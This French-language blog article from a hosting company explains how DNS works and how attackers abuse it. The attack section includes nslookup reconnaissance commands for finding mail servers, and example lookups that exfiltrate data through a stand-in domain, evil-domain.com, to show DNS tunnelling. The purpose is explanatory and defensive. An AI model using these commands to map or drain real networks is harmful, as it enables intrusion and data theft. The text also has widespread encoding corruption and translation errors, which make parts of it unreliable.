Quel est le syst√®me DNS des noms de domaine ? - ūüŹÜ Serveur g√©r√©
7 Octobre 2021

Quel est le système DNS des noms de domaine ?

Principes de base du fonctionnement du DNS sur Internet et de la sécurité

Explication du système DNS sur la bannière Internet

Le syst√®me de noms de domaine (DNS) est un composant fondamental du r√©seau moderne qui se traduit entre les noms de domaine lisibles par l'homme et les adresses IP (Internet Protocol) sous-jacentes que les appareils connect√©s utilisent pour communiquer entre eux. Le DNS est ant√©rieur au World Wide Web et facilite pratiquement toutes les communications sur Internet, ainsi que d'autres utilisations qui ne pouvaient m√™me pas √™tre imagin√©es lorsqu'il a √©t√© d√©velopp√© au d√©but des ann√©es 80. Cependant, le manque de fonctionnalit√©s de s√©curit√© dans ce protocole r√©seau de longue dur√©e a conduit √† de nombreuses vuln√©rabilit√©s et attaques. Dans cet article, nous r√©pondrons √† des questions telles que ¬ę Qu'est-ce que le DNS ? ¬Ľ, ¬ę Comment fonctionne le DNS ? ¬Ľ et "Quels sont les diff√©rents types d'enregistrements DNS ?"

Qu'est-ce que le DNS ?

DNS est souvent appel√© la version Internet du Pages Jaunes . Autrefois, lorsque vous deviez trouver une adresse professionnelle, vous la cherchiez dans les pages jaunes. Le DNS est exactement comme √ßa, sauf que vous n'avez pas besoin de rechercher quoi que ce soit - votre ordinateur connect√© √† Internet le fait pour vous. Voici comment votre ordinateur sait comment trouver Google , ESPN.com ou Managedserver.it.

Pour que deux ordinateurs communiquent sur un r√©seau IP, le protocole exige qu'ils aient besoin d'une adresse IP. Consid√©rez une adresse IP comme une adresse postale : pour qu'un ordinateur en "localise" un autre, il doit conna√ģtre le num√©ro de l'autre ordinateur. Puisque la plupart des gens se souviennent mieux des noms - www.google.it - que les nombres - 142.250.185.163, n√©cessitaient un programme informatique pour traduire les noms en adresses IP.

Le DNS est le plus souvent consid√©r√© dans le contexte du World Wide Web, mais en r√©alit√©, il existe une recherche DNS derri√®re presque tous les types de requ√™tes r√©seau, m√™me celles qui ne sont pas initi√©es par un utilisateur. Les mises √† jour logicielles, les applications de m√©dias sociaux et m√™me les logiciels malveillants atteignent g√©n√©ralement un nom d'h√īte plut√īt qu'une adresse IP. De cette fa√ßon, si l'adresse IP sous-jacente change, la connectivit√© peut toujours √™tre √©tablie.

Comment fonctionne le DNS

Le DNS fait tellement partie intégrante d'Internet qu'il est important de comprendre son fonctionnement.

Consid√©rez DNS comme un carnet d'adresses, mais au lieu de mapper les noms des personnes √† leurs adresses, le carnet d'adresses mappe les noms d'ordinateurs aux adresses IP. Chaque mappage est appel√© un ¬ę enregistrement DNS ¬Ľ. Les clients DNS sur les appareils connect√©s atteignent les serveurs DNS pour r√©cup√©rer ces enregistrements. Diff√©rents types d'enregistrements sont utilis√©s √† des fins diff√©rentes. Les navigateurs Web reposent sur un enregistrement de type ¬ę A ¬Ľ, tandis que l'enregistrement ¬ę MX ¬Ľ indique la direction vers un serveur de messagerie. Voici comment vous pouvez h√©berger un site Web avec un fournisseur de services et un service de messagerie avec un autre.

Voici un aper√ßu de l'enregistrement ¬ę A ¬Ľ pour varonis.com tel qu'il est vu par un utilitaire de ligne de commande populaire appel√© DiG :

Comme vous pouvez le voir dans l'exemple, il est possible d'avoir plusieurs enregistrements pour un seul nom d'h√īte ou domaine. Cela peut √™tre utilis√© pour fournir une redondance et un √©quilibrage de charge.

Internet a beaucoup d'ordinateurs, donc il ne sert √† rien de mettre tous ces enregistrements dans un seul gros livre. Au lieu de cela, le DNS est organis√© en livres ou domaines plus petits. Les domaines peuvent √™tre tr√®s volumineux, ils sont donc organis√©s en plus petits livres, appel√©s ¬ę zones ¬Ľ. Aucun serveur DNS ne stocke tous les livres - ce ne serait pas pratique.

Au lieu de cela, DNS fonctionne de mani√®re distribu√©e, avec des millions de serveurs dans le monde travaillant ensemble. Lorsque votre ordinateur souhaite effectuer une recherche DNS, il peut demander au serveur DNS de votre routeur local. Le routeur local effectuera √† son tour une requ√™te ¬ę en amont ¬Ľ vers un autre serveur DNS, souvent fourni par un fournisseur d'acc√®s Internet. Les requ√™tes pour un domaine peuvent aller ¬ę en amont ¬Ľ jusqu'√† ce qu'elles atteignent l'autorit√© du domaine ou le ¬ę serveur de noms faisant autorit√© ¬Ľ. En pratique, les r√©sultats sont souvent ¬ę mis en cache ¬Ľ √† des niveaux inf√©rieurs pour √©viter d'avoir √† ex√©cuter l'int√©gralit√© du processus pour chaque requ√™te.

Un serveur de noms faisant autorit√© est l'endroit o√Ļ les administrateurs g√®rent les noms de serveur et les adresses IP de leurs domaines. Chaque fois qu'un administrateur DNS souhaite ajouter, modifier ou supprimer un nom de serveur ou une adresse IP, il modifie son serveur DNS faisant autorit√© (parfois appel√© ¬ę serveur DNS principal ¬Ľ). Il existe √©galement des serveurs DNS ¬ę esclaves ¬Ľ ; ces serveurs DNS conservent des copies des enregistrements DNS pour leurs zones et domaines.

Requêtes DNS, serveurs et types d'enregistrement

Les concepts de base du DNS sont relativement simples, mais au fil des ans, le c√īt√© technique des choses est devenu de plus en plus complexe. Voici un aper√ßu de certains des m√©canismes internes du syst√®me :

Quels sont les types de requêtes DNS ?

Une requ√™te DNS est le message envoy√© par un client √† un serveur DNS ou entre deux serveurs DNS. Une requ√™te DNS peut √™tre l'une des suivantes :

  1. Requête DNS récursive

Dans une requ√™te DNS r√©cursive, un client DNS atteindra un serveur, qui √† son tour effectuera des requ√™tes en amont pour le domaine en question jusqu'√† ce qu'un r√©sultat soit trouv√©. La seule r√®gle d√©finie pour une requ√™te r√©cursive est qu'un r√©sultat doit √™tre renvoy√©, s'il y en a un. Il peut y avoir une ou des dizaines de r√©cursions. Le serveur initial ou m√™me le client DNS local peuvent d√©j√† avoir un r√©sultat mis en cache. Une valeur de dur√©e de vie (TTL) d√©termine la dur√©e pendant laquelle l'un de ces r√©sultats peut √™tre mis en cache ; une fois le TTL atteint, le client ou le serveur devra rechercher les r√©sultats en amont.

  1. Requête DNS itérative

Contrairement aux requêtes DNS récursives, les requêtes DNS itératives ne voyagent pas en amont. Au lieu de cela, le serveur DNS auquel le client s'adresse fera de son mieux pour répondre à la requête. Sinon, il peut suggérer un serveur DNS différent, tel qu'un serveur de noms faisant autorité ou un serveur de noms TLD. Le demandeur continuera ce processus itératif jusqu'à ce qu'il trouve une réponse ou expire.

Quels sont les types de serveurs DNS ?

Comme d√©j√† indiqu√©, DNS est un syst√®me distribu√©, ce qui signifie que les serveurs du monde entier travaillent ensemble pour maintenir et fournir des enregistrements DNS. Diff√©rents types de serveurs ont des r√īles diff√©rents au sein du syst√®me global :

  1. DNS récursif

Parfois appel√© r√©solveur r√©cursif, un r√©curseur DNS re√ßoit les requ√™tes des clients DNS, r√©pond si un hit est disponible dans le cache ou atteint un serveur de noms plus haut dans la cha√ģne. Les appels sont souvent trait√©s par les FAI, mais il est facile de modifier la configuration DNS d'un ordinateur pour pointer vers une autre source pour des raisons de performances, de s√©curit√© ou de confidentialit√©.

  1. Serveur racine DNS

Comme son nom l'indique, les serveurs racine sont la base √† partir de laquelle toute l'infrastructure DNS est construite. Les serveurs racines agissent comme des serveurs de noms faisant autorit√© pour les domaines de premier niveau (TLD) tels que ¬ę .com ¬Ľ et ¬ę .net ¬Ľ. Il y a un probl√®me, cependant, parce que les serveurs racine eux-m√™mes sont r√©f√©renc√©s par des noms d'h√īte au sein de ces m√™mes TLD. Si un client DNS ne peut pas d√©terminer vers quel serveur de noms se tourner pour ¬ę .net ¬Ľ, comment peut-il √©ventuellement r√©soudre un domaine pleinement qualifi√© comme ¬ę a.root-servers.net ¬Ľ ? La r√©ponse est que les clients DNS et les serveurs de bas niveau sont ¬ę amorc√©s ¬Ľ avec une liste de treize adresses IP de serveur principal. Ces adresses n'ont pas tendance √† changer souvent et une seule d'entre elles doit √™tre accessible pour r√©parer les autres.

  1. Serveur de noms TLD

Les serveurs de noms de TLD n'ont d'importance que les serveurs racines, car ils savent o√Ļ aller pour obtenir des r√©ponses sur n'importe quel domaine au sein d'un TLD donn√©. Lors de la recherche www.managedserver.it , un serveur TLD pour ".com" r√©pondra en premier, pointant le client vers le serveur de noms avec les enregistrements pour "managedserver". partie du nom de domaine.

  1. Serveur de noms faisant autorité

Le serveur de noms faisant autorité est le dernier arrêt pour une requête DNS. Ce serveur, ou souvent serveur pour des raisons de redondance, est la plus haute autorité pour un domaine donné. Cependant, toutes les requêtes DNS n'atteignent pas le serveur de noms faisant autorité, car des résultats mis en cache peuvent être plus proches de la requête initiale.

Les organisations utilisent √©galement souvent le DNS en interne. L'op√©ration n'est pas tr√®s diff√©rente, sauf que les recherches et les enregistrements DNS restent dans le r√©seau de l'entreprise plut√īt que sur Internet. C'est ce qu'on appelle le DNS ¬ę priv√© ¬Ľ ou ¬ę local ¬Ľ par opposition au service DNS public.

Quels sont les types d'enregistrements DNS ?

Les enregistrements DNS sont disponibles dans une grande vari√©t√© de types, chacun √©tant utilis√© √† des fins diff√©rentes. Voici quelques-unes des plus courantes :

  1. Enregistrement "A" - Utilisation classique du DNS, traduit un domaine en une adresse IPv4.
  2. Enregistrement ¬ę AAAA ¬Ľ - M√™me fonctionnalit√© qu'un enregistrement ¬ę A ¬Ľ, mais en utilisant une adresse IPv6 au lieu d'IPv4.
  3. L'enregistrement "MX" - Abréviation de "Mail Exchange", identifie le serveur de messagerie associé au domaine.
  4. Enregistrement ¬ę TXT ¬Ľ : utilis√© √† des fins tr√®s diverses, de la preuve de propri√©t√© du domaine √† la signature cryptographique des e-mails pour lutter contre le spam.

Avantages et faiblesses du DNS

avantages

Il existe de nombreuses bonnes raisons pour lesquelles nous utilisons toujours le DNS après toutes ces années. Certains des avantages du système comprennent :

  • Il est distribu√© et r√©silient

Il n'y avait pas beaucoup de domaines utilis√©s au d√©but d'Internet, il est donc concevable que nous ayons pu nous retrouver avec une seule base de donn√©es centrale avec tous les mappages de domaine √† IP. Ceci, bien s√Ľr, n'aurait pas permis l'√©volutivit√© n√©cessaire pour alimenter l'Internet moderne. La nature distribu√©e du DNS signifie √©galement que le syst√®me est r√©silient ; une panne de courant, un c√Ęble fibre coup√© ou une cyberattaque sur un serveur DNS n'interrompra pas le syst√®me dans son ensemble.

  • Il est polyvalent et extensible

Les développeurs DNS ont toujours voulu que le protocole soit extensible à mesure que la technologie progressait. Les extensions de la norme DNS d'origine ont apporté de nouvelles fonctionnalités et fonctionnalités tout en maintenant la compatibilité descendante. Au fil des ans, de nouveaux types d'enregistrements, des règles améliorées pour la livraison des paquets DNS et une sécurité améliorée ont été ajoutés.

  • C'est une norme ouverte et bien document√©e

Le DNS n'est pas né de la domination d'un fournisseur particulier ou d'un désir de gagner des parts de marché. L'Internet Engineering Task Force (IETF) publie ouvertement l'ensemble des règles qui composent le protocole, permettant à tout développeur de logiciels d'implémenter le DNS dans ses produits. Il existe de nombreuses implémentations différentes de clients et de serveurs DNS, mais comme elles sont conformes à une norme commune, elles peuvent toutes fonctionner ensemble.

Faiblesses et vulnérabilités

Les premières itérations du système de noms de domaine (DNS) remontent au début des années 80, bien avant l'émergence des menaces modernes de cybersécurité. En conséquence, DNS et de nombreux autres protocoles plus anciens encore utilisés aujourd'hui, tels que ARP et IMCP, n'ont jamais inclus beaucoup de fonctionnalités de sécurité. Au cours des années qui ont suivi, un certain nombre d'extensions et d'atténuations ont été conçues à mesure que de nouvelles menaces sont apparues, mais le DNS est encore souvent abusé par les attaquants.

Du point de vue d'un acteur de la menace, plusieurs caract√©ristiques rendent le DNS attrayant :

  • Chaque r√©seau l'utilise

Le DNS est omniprésent. Presque tous les réseaux informatiques du monde verront des milliers ou des millions de requêtes DNS chaque jour. Bien que cela ne soit pas techniquement nécessaire pour qu'un réseau IP fonctionne, le blocage ou la limitation du DNS n'est tout simplement pas pratique, donc presque tous les pare-feu de la planète sont configurés pour autoriser le trafic sortant sur le port 53. Cela signifie que les attaquants n'ont pas seulement un sortir d'un réseau compromis, mais il y a aussi beaucoup de trafic légitime avec lequel ils peuvent fusionner.

  • Il n'y a pas d'authentification

Comme beaucoup d'autres premiers protocoles r√©seau, DNS n'a jamais inclus de m√©canisme d'authentification. Cela signifie que dans le protocole DNS principal, il n'est pas possible d'√™tre s√Ľr qu'un certain r√©sultat est authentique. Les attaquants en ont profit√© avec toute une gamme d'opportunit√©s d'attaques d'usurpation d'identit√© et d'empoisonnement qui ciblent tout, des machines individuelles aux vastes pans de l'ensemble d'Internet.

Le manque d'authentification dans le DNS a fait la une des journaux en 2008 lorsque le chercheur en sécurité Dan Kaminsky a découvert une énorme vulnérabilité qui aurait pu permettre aux attaquants d'empoisonner le cache de presque tous les serveurs DNS utilisés à l'époque. . Le résultat était que même avec très peu de compétences techniques, un attaquant pouvait tromper des serveurs DNS légitimes en leur faisant envoyer de fausses informations IP pour des domaines importants comme une banque ou une institution gouvernementale.

Face à la menace de faux enregistrements DNS faisant des ravages dans la communauté Internet, les fournisseurs de services et les organismes de normalisation se sont associés pour adopter ce qu'on appelle les extensions de sécurité du système de noms de domaine (DNSSEC). DNSSEC utilise la cryptographie à clé publique pour signer numériquement les résultats DNS, garantissant que la réponse à une requête est bien authentique.

  • Il n'y a pas de cryptage non plus

Les requ√™tes DNS et leurs r√©ponses sont envoy√©es en texte clair, ce qui signifie que n'importe qui sur le r√©seau peut les voir avec un outil comme Wireshark . Cela pr√©sente des probl√®mes potentiels de confidentialit√©, car cela signifie que vos coll√®gues, votre patron ou m√™me votre FAI peuvent dire avec quels domaines vous avez interagi. Cela est √©galement vrai pour les sites Web qui tirent parti du cryptage SSL / TLS ; les donn√©es r√©elles transf√©r√©es entre le site et votre ordinateur peuvent ne pas √™tre visibles, mais cette requ√™te DNS initiale qui vous a donn√© l'adresse IP du site en premier lieu l'est.

Deux approches concurrentes ont √©t√© avanc√©es pour envelopper le trafic DNS avec une couche de cryptage lorsqu'il traverse un r√©seau : DNS sur HTTPS (DoH) et DNS sur TLS. Quelle approche utiliser - et si le DNS doit √©galement √™tre crypt√© en premier lieu - est sujet de d√©bats houleux .

Types d'attaques DNS

Attaques de reconnaissance DNS

Le DNS concerne uniquement les informations qui, du point de vue d'un attaquant, peuvent √™tre un outil pr√©cieux. Les requ√™tes DNS peuvent √™tre utilis√©es pour cartographier l'infrastructure r√©seau d'une victime en r√©v√©lant h√īte en direct sur un r√©seau , en d√©couvrant les noms d'h√īte des cibles de grande valeur telles que les serveurs de messagerie et les fichiers, et en fournissant des indices sur les applications et les services utilis√©s. Vous pouvez effectuer votre mission de reconnaissance DNS locale simplement en suivant les instructions ci-dessous :

Si vous avez un ordinateur Windows, ex√©cutez les commandes suivantes telles quelles ; si vous √™tes un utilisateur Linux, vous pouvez rechercher des commandes correspondantes.

  1. Ouvrez une invite de commande (tapez Ctrl + esc, les lettres "cmd", puis entrez).
  2. Tapez ipconfig
  3. Vous verrez le domaine DNS dans lequel vous vous trouvez (suffixe DNS spécifique à la connexion), votre adresse IP et un tas d'autres choses. Vous voudrez vous y référer.
  4. Tapez nslookup [adresse IP] Vous verrez le nom du serveur DNS qui répond et, si le nom est connu, l'enregistrement DNS qui répertorie le nom et l'adresse IP.
  5. nslookup ‚Äďtype = soa [votre domaine] Cette commande renvoie votre serveur DNS faisant autorit√©, cela ne serait pas utile si vous essayiez d'infiltrer un r√©seau.
  6. nslookup ‚Äďtype = MX [votre domaine] Cette commande renvoie tous les serveurs de messagerie sur votre domaine local, au cas o√Ļ vous voudriez pirater les serveurs de messagerie et ne savez pas o√Ļ ils se trouvent.

Comme nous l'avons d√©j√† appris, la plupart des r√©seaux ont beaucoup de requ√™tes DNS en cours tout le temps. Pour de nombreux produits de s√©curit√© standard et solutions de surveillance de r√©seau, les requ√™tes utilis√©es par un attaquant pour √©num√©rer un r√©seau ne sont pas tr√®s diff√©rentes de toutes les autres requ√™tes l√©gitimes. 

Piratage DNS pour rediriger le trafic

L'absence d'authentification dans le protocole DNS d'origine donne aux attaquants un énorme avantage car cela signifie que les requêtes et les réponses peuvent être manipulées ou falsifiées dans de nombreux endroits différents, de la machine locale aux résolveurs DNS mondiaux.

Une attaque de r√©seau local classique consiste √† encha√ģner Usurpation d'ARP avec un serveur DNS non autoris√©. En cas de succ√®s, les autres machines du r√©seau achemineront leurs requ√™tes DNS vers un serveur contr√īl√© par l'attaquant. L'attaquant peut alors renvoyer ses adresses IP pour ces requ√™tes au lieu de l'adresse l√©gitime. Sans les mesures d'att√©nuation en place, un utilisateur pourrait saisir un domaine comme example.com, voir une page se charger et ne jamais avoir aucune indication qu'il communiquait r√©ellement avec un faux malveillant.

Les attaquants peuvent √©galement utiliser diverses techniques pour empoisonner le cache des serveurs DNS l√©gitimes . Cela se produit g√©n√©ralement lorsque les organisations ex√©cutent leur propre r√©curseur DNS local ; une attaque r√©ussie d'empoisonnement du cache sur un grand fournisseur de DNS public pourrait avoir un impact mondial, de sorte que ces fournisseurs ont tendance √† √™tre tr√®s soucieux de la s√©curit√©. Cependant, m√™me les grands fournisseurs ils ne sont pas √† l'abri des vuln√©rabilit√©s .

Si un attaquant réussit à usurper une réponse DNS, il peut transformer le cache du serveur DNS destinataire en un enregistrement empoisonné. Alors, comment cela aide-t-il les attaquants?

Voici un exemple : disons qu'un attaquant apprend que votre organisation utilise une application externe pour quelque chose d'important, comme des d√©penses. S'ils empoisonnent le serveur DNS de votre organisation afin qu'il envoie chaque utilisateur au serveur de l'attaquant, tout ce qu'ils ont √† faire est de cr√©er une page de connexion d'apparence l√©gitime et les utilisateurs entreront leurs informations d'identification. Ils pourraient m√™me transf√©rer le trafic vers le serveur r√©el (agissant comme un ¬ę homme du milieu ¬Ľ), afin que personne ne le remarque. L'attaquant peut ensuite essayer ces informations d'identification sur d'autres syst√®mes, les vendre ou simplement c√©l√©brer avec un rire m√©chant.

Utiliser DNS comme canal secret

√Čtant donn√© que le trafic DNS sortant n'est pratiquement jamais bloqu√©, et a tendance √† √™tre important, l'utilisation du DNS pour l'exfiltration de donn√©es ou les communications secr√®tes est devenue la tactique pr√©f√©r√©e de nombreux adversaires sophistiqu√©s. L'objectif des attaquants est de fusionner avec tout ce trafic r√©seau l√©gitime via une technique appel√©e Tunnellisation DNS . Dans certains cas, un attaquant utilisera simplement le protocole DNS de mani√®re non pr√©vue pour le transfert de donn√©es. Cela peut toutefois √™tre risqu√©, car cela pourrait g√©n√©rer des pics importants ou des mod√®les de trafic inhabituels qu'une organisation bien pr√©par√©e peut rapidement remarquer.

Une approche plus sophistiqu√©e implique une mauvaise utilisation de l'infrastructure DNS elle-m√™me. L'attaquant mettra en place un domaine DNS (evil-domain.com, par exemple) sur Internet et cr√©era un serveur de noms faisant autorit√©. Ensuite, sur l'h√īte compromis, l'attaquant peut utiliser un programme qui divise les donn√©es en petits morceaux et les ins√®re dans une s√©rie de recherches, comme ceci :

  • nslookup My1secret1.evil-domain.com
  • nslookup est1que1je1sais.evil-domain.com
  • nslllookup how2steal1data.evil-domain.com

Le serveur DNS de corp.com recevra ces requêtes, se rendra compte que les résultats ne sont pas dans son cache et relaiera ces requêtes au serveur de noms faisant autorité de evil-domain.com. L'attaquant attend ce trafic, puis exécute un programme sur le serveur de noms faisant autorité pour extraire la première partie de la requête (toute avant evil-domain.com) et la réassembler. À moins que votre organisation n'inspecte les requêtes effectuées par les serveurs DNS, elle ne se rendra peut-être jamais compte que leurs serveurs DNS ont été utilisés pour exfiltrer des données.

Et encore plus de types d'attaques !

La liste ci-dessus n'est en aucun cas une liste compl√®te de toutes les attaques DNS possibles. Le protocole a √©t√© abus√© pour tout, de Campagnes DDoS al surveillance secr√®te des internautes . Des attaquants ont r√©cemment √©t√© observ√©s modifier la configuration DNS dans diff√©rentes vari√©t√©s de routeurs domestiques pour propager des logiciels malveillants . Les acteurs malveillants et les chercheurs en s√©curit√© sont constamment √† la recherche de nouvelles vuln√©rabilit√©s et il est peu probable que leur attention se d√©place de si t√īt.

Le DNS existe depuis longtemps et chaque ordinateur connect√© √† Internet en d√©pend. Les attaquants utilisent d√©sormais DNS pour la reconnaissance externe et interne, pour d√©tourner le trafic et cr√©er des canaux de communication secrets. Heureusement, surveillance des serveurs DNS e application de l'analyse de s√©curit√© , bon nombre de ces attaques peuvent √™tre d√©tect√©es et √©vit√©es.

Vous avez des doutes ? Vous ne savez pas par o√Ļ commencer ? Contactez-nous


Nous avons toutes les réponses à vos questions pour vous aider à faire le bon choix.

Discute avec nous

Discutez directement avec notre support avant-vente.

0256569681

Contactez-nous par téléphone pendant les heures de bureau 9h30 - 19h30

Contactez-nous en ligne

Ouvrez une demande directement dans l'espace contact.

INFORMATIONS

ManagedServer.it est le premier fournisseur italien de solutions d'hébergement hautes performances. Notre modèle d'abonnement est abordable et prévisible, afin que les clients puissent accéder à nos technologies d'hébergement fiables, à nos serveurs dédiés et au cloud. ManagedServer.it offre également d'excellents services d'assistance et de conseil sur l'hébergement des principaux CMS Open Source tels que WordPress, WooCommerce, Drupal, Prestashop, Magento.

Remonter en haut